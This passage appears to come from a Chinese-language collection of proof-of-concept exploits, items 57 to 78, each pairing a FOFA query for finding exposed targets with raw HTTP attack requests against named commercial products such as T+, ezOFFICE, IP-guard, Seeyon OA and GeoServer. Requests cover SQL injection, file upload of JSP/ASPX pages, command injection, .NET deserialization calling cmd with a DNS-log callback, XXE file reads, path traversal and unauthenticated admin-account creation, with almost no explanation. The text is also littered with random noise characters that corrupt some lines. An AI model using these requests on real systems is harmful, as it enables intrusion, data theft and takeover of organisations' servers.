Host: x.x.x.x! l5 X/ h5 Q9 b$ z. B4 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
: J& y7 z7 r. e% |3 c; {9 {Content-Type: application/json1 R5 ?: t* A; ?: W# Y a
& P2 T4 J) k2 C
{, e2 B2 y# u* H+ ]6 u) h3 _, [3 [
"storeID":{
2 i a& U, Q; G: ^- E "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
' g" \2 C, L9 L' B" z "MethodName":"Start",
6 n. a1 V& I9 f. ^ "ObjectInstance":{
+ D8 p! ]! o2 O; T "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",2 }( T; q, w5 s
"StartInfo": {
( q% \( w) A8 y. N" h "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
+ s! [2 m# y! r+ f( }( n: o8 R U7 U "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"- v/ h% H! z* t' H0 b/ F; f* P
}
+ s% L! e. h) e% ~" A2 j }; F# u5 J3 g3 ]/ u6 `$ Y7 K/ _
}8 s$ D8 v/ i6 g' E% I
}
]+ d$ O- S0 j3 E0 K7 d* m& G$ x6 _% d/ o- K' }& |, }% |' q
& Q, v" N2 [8 y" m8 Z$ \57. 畅捷通T+ keyEdit.aspx SQL注入
( E$ q0 a% i* n0 W, `7 uFOFA:app="畅捷通-TPlus"# V7 D# W( L% S$ t* }
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.10 }+ h. M: C/ ?4 g$ M
Host: host( _2 S7 h4 F8 l, F" I8 a X9 b; G
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36, N* n( y5 {1 Z, ?- X8 R5 [
Accept-Charset: utf-8
) v# U1 w8 j) U- UAccept-Encoding: gzip, deflate! q. K! E3 f5 [1 [1 e/ Q
Connection: close# I2 |- z# |! c. d& G8 i9 d, c/ E" [
1 c; y# T4 ^8 K" _$ C
{# B8 d% O( g. i$ N+ Y6 H58. 畅捷通T+ KeyInfoList.aspx sql注入
/ C! w7 f6 H8 l6 \2 Q5 o. q% c+ ^3 DFOFA:app="畅捷通-TPlus"
! X$ O- v$ V5 Z, e" c: `: v" aGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
p8 n$ A0 B/ UHost: your-ip% h9 x" f4 {& c+ }0 e, c
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.366 D/ @8 |* w. r$ T8 a# ~: D( @
Accept-Charset: utf-8. m+ l+ C: U. R% @
Accept-Encoding: gzip, deflate
o# x9 N, J) S( W0 R/ t' g BConnection: close
# n. B4 C# C8 ]5 S1 }' R+ S9 c3 k5 j# Q$ J* f
8 B" e' B. Q9 a0 H- P59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
2 L: K' x- ]5 Q5 ~6 a6 dFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"# k+ ?) A ^5 w1 h
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1- L3 M6 M+ ?% j/ G( ~
Host: 192.168.86.128:9090
0 e, d6 p% |: ^# LUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
8 h3 E* f' l" b3 q# W9 ?! q) UConnection: close& n! t! N1 ]/ K/ R3 q Z
Content-Length: 1669
1 Y0 q" m5 j8 o, o6 ^: OAccept: */*
# g" F6 G; H( FAccept-Language: en
/ F9 I5 ~2 n* t& @+ W4 w( vContent-Type: application/x-www-form-urlencoded8 J+ f0 v' j% y
Accept-Encoding: gzip
9 r% H! [' }3 y* \$ o( g
0 U3 `3 D2 i+ w" SPAYLOAD
0 O) ]; J7 h: h/ J5 V: l1 ?+ r( {+ H) `( M6 F2 T O! k
$ r5 E8 \1 W' J8 }60. 百卓Smart管理平台 importexport.php SQL注入) o, V; n6 }7 o; g) \& o
FOFA:title="Smart管理平台"5 w, O9 Y$ H, b0 L% Q
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.11 l- A! G% g1 s1 M. L6 N
Host:" _$ g- B+ q+ R& s( u- ?7 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
: x0 c8 B% t* ]: WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) O( E5 @$ S% K( B9 b% XAccept-Encoding: gzip, deflate- R' E$ D" H) j
Accept-Language: zh-CN,zh;q=0.9
/ P( P: T" f2 m3 ]Connection: close, s) c8 H, |7 S/ j( M1 Y( r! u2 Z
7 N v6 r/ O* D. e- _# P7 M, @
7 C1 Z# j: E' L! Q- Z
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
3 n4 K" ~+ l/ b" FFOFA: title="欢迎使用浙大恩特客户资源管理系统"
& q: o6 [- ^% D' ^ `4 VPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
* {- H& |9 Z4 aHost: x.x.x.x
5 e: q! R, b& i9 D! K- ]8 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. U& _/ r# T2 B6 F
Connection: close$ c: N2 \ w5 l4 a/ }! \, b
Content-Length: 27% ~, k# d6 z0 k- l' g3 A I/ k
Accept: */*# n1 u% q) C( l: x
Accept-Encoding: gzip, deflate
# c _5 V& Z- N3 b' ?9 e4 p% sAccept-Language: en
M% G- K& a( WContent-Type: application/x-www-form-urlencoded% r( o/ X: g3 C0 W! K5 S; e
* s* ^5 [4 z9 b$ |8 j3 D0 m
8uxssX66eqrqtKObcVa0kid98xa
$ [9 c6 ~% I' T; x
& ]7 ^+ ^& T0 g3 t, ^3 B% \# Q! B/ B7 Y h( f$ v' N( C d, h: _
62. IP-guard WebServer 远程命令执行 G) @2 P( |% t- ~
FOFA:"IP-guard" && icon_hash="2030860561"
% m, Z% w) V$ `0 S0 |4 T" gGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
/ N0 B4 B, B$ FHost: x.x.x.x
3 P- [) h5 C I! A6 sUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
+ C" E2 P4 m* U* a4 yConnection: close& p1 v% g5 M2 ~8 l8 f# ^1 S& t
Accept: */*2 X3 Z7 z( j2 i. J) X7 a* H
Accept-Language: en2 b' N! k' A# W% y0 [: |8 q+ K
Accept-Encoding: gzip2 y5 s$ f5 t& |+ d( k8 I- I
- T2 O6 P) i- P" |2 Y! \6 D0 x5 R7 b5 c/ n
访问
! O1 {% _+ f; w$ @3 d
7 ?! `, A5 o- rGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.16 }9 }8 M( Z3 p3 x0 R% X6 J0 S- m
Host: x.x.x.x
; Q# L. Q3 l9 s& a6 y i- J
5 ^2 {8 x" H: _) N; \$ X5 s) A2 v( a1 V6 z9 v2 ~! Z- w$ D
63. IP-guard WebServer任意文件读取# ~4 O; Z7 M* |+ \) D9 x- s
IP-guard < 4.82.0609.08 ]; m3 j4 D6 H
FOFA:icon_hash="2030860561"- ^7 b4 y: ~% f5 H. h. x0 a& t& l
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1( R' ~; V: x8 }5 L- U9 b. h0 k
Host: your-ip
" ^+ Y% v( d$ q% e. C4 e$ qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36; U' t9 I/ l2 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) M5 |! E5 k3 _ H5 [Accept-Encoding: gzip, deflate& F( d" |9 O5 u: X
Accept-Language: zh-CN,zh;q=0.9
/ T6 \( J8 }; A9 LConnection: close
- r! G$ d* ]$ Z" W+ gContent-Type: application/x-www-form-urlencoded# O W! `# L r( B+ T& C
! y6 W# A1 E' ]: Z( z
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
8 [ T2 r5 Q7 u$ ^' O1 [
% E3 `! t; v- |1 y- c: v6 }( T$ B64. 捷诚管理信息系统CWSFinanceCommon SQL注入- @) I6 R9 m9 I+ }6 x
FOFA:body="/Scripts/EnjoyMsg.js"4 D6 d3 u9 b3 |" }6 K1 ?: y9 g" D1 j
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
. E: n: b, E# P& OHost: 192.168.86.128:9001
6 F7 v3 @& n: O+ [& y W& RUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36) L- J6 d4 `. p1 V6 O5 A: w
Connection: close- j. [8 T+ M9 T- `, t _# ^4 F
Content-Length: 369
8 J) S, x! G: n/ iAccept: */*
8 x3 s) g! A' w! F; GAccept-Language: en) [# N, a' w! z! S, b
Content-Type: text/xml; charset=utf-8+ g, |9 B" @2 L7 ~
Accept-Encoding: gzip
3 i- b( R- a9 ]5 \6 C, `+ V+ \3 I& Y4 K% c
<?xml version="1.0" encoding="utf-8"?>0 Z9 G. a- d) x- u5 E
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">3 ]7 R: Q1 u; ^9 \
<soap:Body>3 U, Y* I/ V9 a! [. A ^
<GetOSpById xmlns="http://tempuri.org/">
) j4 P; i; o4 _% C' U <sId>1';waitfor delay '0:0:5'--+</sId>' Y/ r& ?5 c* s# B+ [; P6 T; l
</GetOSpById>. ]7 M# w) s! D0 U. A
</soap:Body>
, R# A# }" [9 y& B3 z z</soap:Envelope>, V5 W- M) x$ P' F$ j
2 T7 }# R' t. x8 e/ {6 I
& o! ~- e/ h* f$ T- ?6 G
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
& S8 Z* v" b( C( R! @FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
# K# C! O; c3 q. w( F响应200即成功创建账号test123456/123456
( b! E# Q+ b9 b, P$ _POST /SystemMng.ashx HTTP/1.1
* ^' A6 _" z. Z) oHost:
% j; [ [0 z0 o+ R% q/ D5 rUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)6 v. W, I* k6 G/ L' x# J
Accept-Encoding: gzip, deflate& Q- E+ X; N3 {' J R0 y Q6 T* Z1 }
Accept: */*
+ I$ X; s- g) R' l/ S& k Q, }4 `Connection: close' b- w- |. y% C5 Y
Accept-Language: en1 U6 X7 p0 B' U( ~/ H
Content-Length: 174
( o3 L# C9 R' O. x# g- J* l; c7 s
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators$ M) A# Y2 n* y. ]. w( M
+ H1 X9 C: ~; K4 o% j
q1 S/ i) a& [3 L7 e" A$ |! U; T66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
7 b9 B( _. T) {( Z3 ^% x; JFOFA:app="万户ezOFFICE协同管理平台"* c3 B O; E, V: f
9 _0 W/ h* r4 i2 T% gGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1) {4 B3 F% y3 Z/ C
Host: x.x.x.x
4 c& T1 x) x7 p9 m. a/ aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36& ^% b+ y- O! a0 b, y4 h7 X3 h
Connection: close3 ]# O9 w2 `9 J) s' V. H$ }
Accept: */*
; z! H8 \: }1 U0 e4 V$ E# CAccept-Language: en
# p6 U; D/ {8 f/ |& @1 z3 U8 UAccept-Encoding: gzip
4 u1 ]* y, k$ {0 m( b- l& {$ Z% T9 [$ |) k$ W: u
/ w# ~+ H: V. m" j第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在2 H6 y3 p9 n; C
1 N6 `1 F2 F T1 r8 ~4 ?67. 万户ezOFFICE wpsservlet任意文件上传
& d% i1 s4 b) O1 U; |# n2 |FOFA:app="万户网络-ezOFFICE"! B& Y9 ]" X7 Z" n
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型& d8 A# S6 Q: z( W( A5 b3 b$ J
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
4 P! W# M) G) _4 {+ RHost: x.x.x.x
: @2 |" \" e/ {User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
* a6 \9 }/ d5 q/ Z8 tContent-Length: 173) g: }4 Y" K: e1 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ g3 ? E% p2 o3 ]1 c( k( lAccept-Encoding: gzip, deflate+ Y3 z: a" t% ]* A& L- e) u
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
/ L2 z6 v$ ~) U, q# h( C4 R# `# ~Connection: close+ @/ u+ q* x( y! I9 ?
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp7 ?1 x- A x5 [( j9 T) j5 N
DNT: 1
, ?0 w: \) T5 \" I' E3 P( Q- bUpgrade-Insecure-Requests: 1
9 _# S; ]- V+ j5 F+ Y8 I5 m+ }. ]& J# {2 T9 i
--ufuadpxathqvxfqnuyuqaozvseiueerp
# @2 V6 _: `7 `$ h3 SContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
; V1 [7 x( n$ \( B$ j5 [7 x4 O1 Y7 W& S* [9 h
<% out.print("sasdfghjkj");%>
& L2 w" ?* s }4 a) m--ufuadpxathqvxfqnuyuqaozvseiueerp--- y% f7 ^' H1 v: Y1 M
' g/ O6 Z; M: U: L. I$ I
) @" ~/ W1 U; g$ X& K4 r
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp/ B* i- t; W) C2 L+ H+ J
. o6 o% V. Y0 p: [8 J% U6 k: T0 t
68. 万户ezOFFICE wf_printnum.jsp SQL注入 B/ `# p) q% v2 i8 d8 n
FOFA:app="万户ezOFFICE协同管理平台"
7 I7 t5 ~, z, L( v+ `3 B( j/ O! ?& ~GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
, R7 e- P; ?* ]9 cHost: {{host}}
; \7 |$ `/ v3 u z" ~. v9 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.368 b. Y, k2 s, t3 _
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
$ ]- u! N$ F& `0 z8 ^6 X% Y6 wAccept-Encoding: gzip, deflate
0 B# ]9 I$ a1 y1 c/ t6 W) k: LAccept-Language: zh-CN,zh;q=0.9# s5 ^! U$ I; |1 X- W3 c! l* t h
Connection: close. T& y* |2 u1 C7 E% Q. B
7 ?$ L1 `3 {3 a5 T) t2 J
# c0 {1 O0 R2 a% B2 J69. 万户 ezOFFICE contract_gd.jsp SQL注入' H# ? f x1 ~( w. r; u
FOFA:app="万户ezOFFICE协同管理平台"5 t9 J' H" O5 f
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1$ e1 ^) b+ B: @4 d% Q
Host: your-ip) _' `2 i8 S& X3 l
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.362 p& _, d" X( l. s
Accept-Encoding: gzip, deflate
" M2 p% D* L2 |6 XAccept: */*
2 k* J$ t- d. N4 s |4 `6 A* vConnection: keep-alive' N9 |% R( E5 _& ?1 Z# ?) ]
1 l5 s, P* \) s, J
/ [; W$ ?; R$ e70. 万户ezEIP success 命令执行
7 i' J. O: s0 O9 r3 Y4 mFOFA:app="万户网络-ezEIP"
% D4 q- W/ l' w" f8 ~POST /member/success.aspx HTTP/1.16 V1 h C8 @ ?- Q
Host: {{Hostname}}# w2 J8 N6 S% }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
1 S+ ^% m4 \$ q( i8 C8 {' S% R; ESID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
/ W v9 m2 t, ~! K& g3 J# kContent-Type: application/x-www-form-urlencoded
/ g. Y" l* l+ J7 _0 A7 p) zTYPE: C+ {4 Q! F" h8 \9 ?
Content-Length: 16702$ u5 H3 P( `3 T8 _! D( Y
7 k" v* Y/ k2 g; v
__VIEWSTATE=PAYLOAD2 z4 h' c9 H* _$ u! _2 @
8 j; G3 _: N/ {. f. R6 u& L1 a" Z8 q: j3 k H
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
. b0 y0 J1 m0 A hFOFA:body="PM2项目管理系统BS版增强工具.zip"
" C$ h# B r$ X6 t' y" ~GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1$ k% c. F b; H7 N/ E) o5 F
Host: x.x.x.xx.x.x.x* w0 r: J: c% ]4 a
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.366 X, Y- d2 k& u2 Y% I
Connection: close
" f/ X' \3 }0 [; e+ Q8 L$ IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 I' U9 F, o% rAccept-Encoding: gzip, deflate
$ e+ w2 p# ~$ c/ L, H. @6 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" ?2 C* C2 q! D7 r. M5 x: n
Upgrade-Insecure-Requests: 1
8 S& L* j- l' R1 [# H. C8 }: V8 R9 M& D9 a
g0 ]1 E+ D- \' l" l Y; Y" m/ b
72. 致远OA getAjaxDataServlet XXE
- M# Z$ [5 |5 ]1 J( y2 R1 U. z6 wFOFA:app="致远互联-OA"
% O& K: C/ }3 O5 N; s$ OPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
/ m9 O& c7 I; y; t" Q: ]0 `Host: 192.168.40.131:8099
( e3 s! e. p r9 P7 n5 `9 m2 S. gUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
0 l% F! B. ~ bConnection: close
: {& f* @# |8 dContent-Length: 583# I2 {6 N, Z: ^% A p0 [. i
Content-Type: application/x-www-form-urlencoded
. p9 Q, x# I* `& bAccept-Encoding: gzip
9 @4 o+ t( K$ W( q3 n, v+ B" r- B
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
3 [3 `; c9 @5 A; W! o! m2 P4 S9 q
3 k# H& ]% L2 }8 |2 ?
73. GeoServer wms远程代码执行6 v# I0 I+ ^) R& s' g% o& G
FOFA:icon_hash=”97540678”! B3 [0 L D6 {6 I. j& m9 B
POST /geoserver/wms HTTP/1.11 E: ^8 G# Z; v6 w0 i$ N1 M9 F2 U
Host:' r6 b* p' k! T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.361 }0 E& r% r+ }$ ?2 D" S+ W& I
Content-Length: 1981
6 J) o2 r4 z' P/ mAccept-Encoding: gzip, deflate E0 J7 [/ J6 K1 `. |+ x7 _2 t
Connection: close
6 H: p$ Y/ V% sContent-Type: application/xml
! M& V7 A( r. d7 NSL-CE-SUID: 3, c* z2 A' G3 J* g& \5 M
+ i* k8 e! V- s. H6 F9 d! O9 G
PAYLOAD$ g$ C1 \) K5 `) g
" o' y- K, W7 _ T7 Z" k$ x: c5 F% g$ D2 ^* T }6 d
74. 致远M3-server 6_1sp1 反序列化RCE
- ]1 R7 z% f3 \$ g0 HFOFA:title="M3-Server"# _" j- q# ^) R: u4 h
PAYLOAD
4 ]6 |6 ~! N+ O$ m" j9 C' u1 H
: D" b3 y. A2 e8 W" l0 t E75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
" r4 [+ _! O u/ bFOFA:app="TELESQUARE-TLR-2005KSH"- @( Q: O/ V0 ]
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1" G9 ]% o5 l6 |" d1 f5 d& F
Host: x.x.x.x
: D% ^1 P% w- `* [% hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" g! e& E" s) s: w0 L* \Connection: close4 n) U3 ~8 K, N
Accept: */*
1 b& {5 i( f6 K: \, h2 xAccept-Language: en
E6 S C& C4 I% J/ IAccept-Encoding: gzip q8 U& } K5 {5 g
" K, z* |7 ?* z0 q& k, X' {- t4 q. _0 o. G. a
GET /cgi-bin/test28256.txt HTTP/1.1
9 t5 _; }5 c9 N% RHost: x.x.x.x
+ f+ u. o6 s. R0 Z
1 i4 Z! r/ p: ]/ G1 b0 A. k
% D# A( \5 A g# Z1 d76. 新开普掌上校园服务管理平台service.action远程命令执行
% g3 N- }9 s+ Z* AFOFA:title="掌上校园服务管理平台"' O: L% n" z: b' L+ S! j: n: n) g2 O" e
POST /service_transport/service.action HTTP/1.1& i, W& @# r* L) T k. S
Host: x.x.x.x( g- O- K! s- ~- K+ d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
1 m( {5 p$ J& R( v; yConnection: close" F, Y9 M! J! H& m
Content-Length: 211
) ~1 q& a7 Z5 m9 _# WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& q9 j: a6 p7 K+ {$ o# }Accept-Encoding: gzip, deflate& v1 Q5 U9 |- b( [4 v- R+ \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ N) J' g3 v, T3 I+ I4 w
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
7 b( v9 D: d9 kUpgrade-Insecure-Requests: 19 }+ \8 q, O" h- T4 n$ Q
5 _/ k1 p) z/ H( T; g{
4 M& Y9 x# c7 y8 G) `"command": "GetFZinfo",/ T5 a( _, S% W4 s
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
, e% k6 x& x2 \( w( R ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
# ]# d% D( A: `! }' P* s' H8 v}# R! G% z k, B* X1 G4 C+ G( h
0 e& k! a- E( {: Y% t8 S+ X
, w9 z6 e1 q B4 PGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
% P" a3 n7 j; i& {+ d1 I" X0 OHost: x.x.x.x
# b1 l/ p- l' ~4 a: R* |8 x9 q8 B7 X$ \& _0 f- B$ a
: J1 p. a/ o) \# g( D, r) ^/ _
5 m/ r" s8 Q* i2 ]9 k77. F22服装管理软件系统UploadHandler.ashx任意文件上传4 k; j; F: f( X: b. J
FOFA:body="F22WEB登陆"& s! ?: N2 p! a' j! N3 s
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
3 w( a5 k0 b- v# U( {Host: x.x.x.x4 w# B/ e6 C- q! v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
9 s$ O1 S. w9 s0 w6 P+ nConnection: close- K3 L9 B4 m) v
Content-Length: 433
5 v* o$ z: }4 Y, o2 D" S; b7 c# ?3 \Accept: */*
+ N; U- |9 v0 h7 u, ~# W6 Q4 zAccept-Encoding: gzip, deflate2 p% o$ \- z( t0 M
Accept-Language: zh-CN,zh;q=0.9
. n1 l; W; H9 s. J+ d- t3 ?Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix! \1 Q, _, M/ `4 W# j& A; J7 R( [
7 A1 B1 L. ]3 ~8 u$ `# |
------------398jnjVTTlDVXHlE7yYnfwBoix
7 [7 C3 f" }5 c( a! NContent-Disposition: form-data; name="folder"5 Z' \/ T9 n$ W. q7 V5 [" b. z
' }) m1 `& E5 o3 d8 L0 F& N
/upload/udplog8 d: {, c# Y9 V9 Y0 k
------------398jnjVTTlDVXHlE7yYnfwBoix
3 R" D* @2 V5 L/ [# V% `. iContent-Disposition: form-data; name="Filedata"; filename="1.aspx"( a( E9 x6 f0 l7 X' r$ p
Content-Type: application/octet-stream
+ J+ a, C' d6 `0 l+ z6 [: L: L; q
hello1234567 x* Z/ K- b. N" c+ w X
------------398jnjVTTlDVXHlE7yYnfwBoix
& C) Z# W) ~- V' MContent-Disposition: form-data; name="Upload"$ b3 U: e& T! M5 e% n
( |# D, j; F+ D! s3 T; j, n* t- sSubmit Query
% [; N# `/ N, N------------398jnjVTTlDVXHlE7yYnfwBoix--, V, |$ R: H: k, L2 ~
. c n ?7 C$ Q. Y, r
$ J9 n+ X+ B4 @: I5 h% j78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
# r$ H) Z7 i* j1 s# U6 |& hFOFA:icon_hash="2001627082": k+ v8 h, s3 w1 q+ X6 y
POST /Platform/System/FileUpload.ashx HTTP/1.18 E, ?. m7 |+ d9 I" k
Host: x.x.x.x
# X0 r& d6 t, p) @" W% C: gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 G! ~+ ^' a6 _! H. E* |' p
Connection: close
- n7 F; h* i! y+ ]! E# ~Content-Length: 3368 X! {7 F, p5 P! A7 }" v
Accept-Encoding: gzip# z$ Z) O B& {/ Y
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l8 n7 a- x$ P8 q& B/ s7 l
5 x8 i1 [9 G Z' U0 I7 Y9 F
------YsOxWxSvj1KyZow1PTsh98fdu6l
' L. J* T3 p8 y4 M+ ]) d: O2 r& b5 PContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
) ^* k7 P n* L- S9 w+ S8 GContent-Type: image/png, e$ H6 Z2 I" n/ U
1 k# _3 N; e i2 e, C1 Y
YsOxWxSvj1KyZow1PTsh98fdu6l
' h# r2 m) X$ F8 L1 t D3 b------YsOxWxSvj1KyZow1PTsh98fdu6l
4 t/ i W7 B1 }: H# fContent-Disposition: form-data; name="target"0 I7 R8 P% E, p2 [2 k4 e
' P4 k& A/ l& m8 U
